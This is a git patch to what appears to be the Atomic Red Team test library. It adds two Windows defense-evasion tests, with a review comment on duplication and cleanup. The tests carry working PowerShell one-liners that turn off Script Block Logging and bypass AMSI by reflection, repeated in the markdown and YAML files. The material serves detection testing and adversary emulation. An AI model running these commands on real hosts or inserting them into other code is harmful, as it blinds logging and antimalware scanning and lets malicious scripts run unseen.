From 6d76b77fc4d8a7b7c360992300c239297171dde7 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Tue, 26 Nov 2019 19:06:03 -0600 Subject: [PATCH] T1089 Disable AMSI & Script Block Logging (#695) * T1089 Disable PoSH AMSI & Script Block Logging * Generate docs from job=validate_atomics_generate_docs branch=t1089-disable-amsi-logging --- atomics/T1089/T1089.md | 50 ++++++++++++++++++++++++++++++++++++++++ atomics/T1089/T1089.yaml | 36 ++++++++++++++++++++++++++++- atomics/index.md | 2 ++ atomics/index.yaml | 29 ++++++++++++++++++++++- atomics/windows-index.md | 2 ++ 5 files changed, 117 insertions(+), 2 deletions(-) diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index 745b8a88..5f387adb 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -30,6 +30,10 @@ - [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service) +- [Atomic Test #14 - Disable PowerShell Script Block Logging](#atomic-test-14---disable-powershell-script-block-logging) + +- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface) +
@@ -311,4 +315,50 @@ sc.exe config #{service_name} start= auto net.exe start #{service_name} ``` +
+
+
+## Atomic Test #14 - Disable PowerShell Script Block Logging
+An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+```
+
+
+#### Cleanup Commands:
+```
+$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+```
+
+
+
+
+## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
+An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+Credit to Matt Graeber (@mattifestation) for the research.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 4ede9312..86b5e4c7 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -200,4 +200,38 @@ atomic_tests:
 sc.exe config #{service_name} start= disabled
 cleanup_command: |
 sc.exe config #{service_name} start= auto
- net.exe start #{service_name}
\ No newline at end of file
+ net.exe start #{service_name}
+
+- name: Disable PowerShell Script Block Logging
+ description: |
+ An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+
+- name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: |
+ An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
+
+ Credit to Matt Graeber (@mattifestation) for the research.
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
\ No newline at end of file
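Review bot: The second new atomic, `PowerShell Bypass of AntiMalware Scripting Interface`, appears to duplicate the existing `Atomic Test #11: AMSI Bypass - AMSI InitFailed` that the index.md context lines in this same commit already list for T1089 — both set the same `amsiInitFailed` field — so it should either be dropped or its description should say what it adds over #11. It is also the only test in the hunk without a `cleanup_command`; for symmetry with the first atomic, a cleanup that sets the field back to `$false`, or a description note that the change only lives in the test's PowerShell process, would tell users what state they are left in. The first atomic's cleanup hard-codes both `EnableScriptBlockLogging` and `EnableScriptBlockInvocationLogging` to 1, which turns invocation logging on where the host never had it enabled; reading the original values before the change and restoring those would leave the host as found. Both commands also index `$GroupPolicySettings['ScriptBlockLogging']`, which presumably is only populated when the script block logging policy is configured on the host, so a prerequisite check or a description note would turn a confusing indexing error into an explicit "not applicable".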
diff --git a/atomics/index.md b/atomics/index.md
index 057a98e3..e102fa0c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -213,6 +213,8 @@
 - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
 - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index b3bc0108..66aeab8e 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6978,9 +6978,36 @@ defense-evasion:
 command: |
 net.exe stop #{service_name}
 sc.exe config #{service_name} start= disabled
- cleanup_command: |-
+ cleanup_command: |
 sc.exe config #{service_name} start= auto
 net.exe start #{service_name}
+ - name: Disable PowerShell Script Block Logging
+ description: "An adversary may disable PowerShell Script Block Logging to avoid
+ leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
+ cleanup_command: |
+ $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
+ $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
+ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
+ - name: PowerShell Bypass of AntiMalware Scripting Interface
+ description: "An adversary may bypass Windows Defender AMSI to execute malicious
+ PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
 T1107:
 technique:
 x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 978851a6..cf69e36c 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -43,6 +43,8 @@
 - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
 - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
+ - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
+ - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)